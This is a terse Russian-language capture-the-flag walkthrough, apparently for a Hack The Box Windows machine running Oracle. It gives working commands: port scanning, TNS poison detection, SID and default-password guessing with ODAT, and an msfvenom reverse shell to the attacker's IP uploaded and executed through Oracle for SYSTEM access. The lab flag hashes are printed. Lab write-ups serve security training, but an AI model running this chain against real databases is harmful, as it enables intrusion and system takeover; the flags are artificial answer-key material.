Обзор сервисов
$ /opt/nmapAutomator/nmapAutomator.sh -H 10.10.10.82 -t Full
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 8.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.5
|_http-title: IIS Windows Server
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1521/tcp open oracle-tns Oracle TNS listener 11.2.0.2.0 (unauthorized)
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49160/tcp open oracle-tns Oracle TNS listener (requires service name)
49161/tcp open msrpc Microsoft Windows RPC
49162/tcp open msrpc Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 4m34s, deviation: 0s, median: 4m34s
| smb-security-mode:
| authentication_level: user
| challenge_response: supported
|_ message_signing: supported
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-06-01T10:05:35
|_ start_date: 2021-06-01T09:57:54
https://github.com/bongbongco/CVE-2012-1675
$ nmap -Pn -sT --script=+oracle-tns-poison -p 1521 10.10.10.82
PORT STATE SERVICE
1521/tcp open oracle
|_oracle-tns-poison: Host is vulnerable!
Публичный эксплоит
odat standalone
https://github.com/quentinhardy/odat/releases/download/5.1/odat-linux-libc2.12-x86_64.tar.gz
Ищем сиды:
$ ./odat-libc2.12-x86_64 sidguesser -s 10.10.10.82 -p 1521
[+] SIDs found on the 10.10.10.82:1521 server: XE
$ wget https://raw.githubusercontent.com/quentinhardy/odat/master-python3/accounts/accounts.txt
Ищем пароли:
./odat-libc2.12-x86_64 passwordguesser -s 10.10.10.82 -p 1521 -d XE --accounts-file accounts.txt
=> scott:tiger
Шелл
$ msfvenom -p windows/x64/shell/reverse_tcp LHOST=10.10.14.6 LPORT=1234 -f exe -o shell.exe
$ ./odat-libc2.12-x86_64 utlfile -s 10.10.10.82 -p 1521 -U scott -P tiger -d XE --sysdba --putFile c:/ shell.exe shell.exe
[1] (10.10.10.82:1521): Put the shell.exe local file in the c:/ folder like shell.exe on the 10.10.10.82 server
[+] The shell.exe file was created on the c:/ directory on the 10.10.10.82 server like the shell.exe file
$ msconsole
$ ./odat-libc2.12-x86_64 externaltable -s 10.10.10.82 -p 1521 -U scott -P tiger -d XE --sysdba --exec C:/ shell.exe
Флаги
> whoami
nt authority\system
6. C:\Users\Phineas\Desktop>ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 10.10.10.82
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 10.10.10.2
Tunnel adapter isatap.{50CD6E47-E5C7-44A8-B294-BA01E18B9E30}:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
C:\Users\Phineas\Desktop>type user.txt
92ede778a1cc8d27cb6623055c331617
7. C:\Users\Administrator\Desktop>ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 10.10.10.82
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 10.10.10.2
Tunnel adapter isatap.{50CD6E47-E5C7-44A8-B294-BA01E18B9E30}:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
C:\Users\Administrator\Desktop>type root.txt
cd39ea0af657a495e33bc59c7836faf6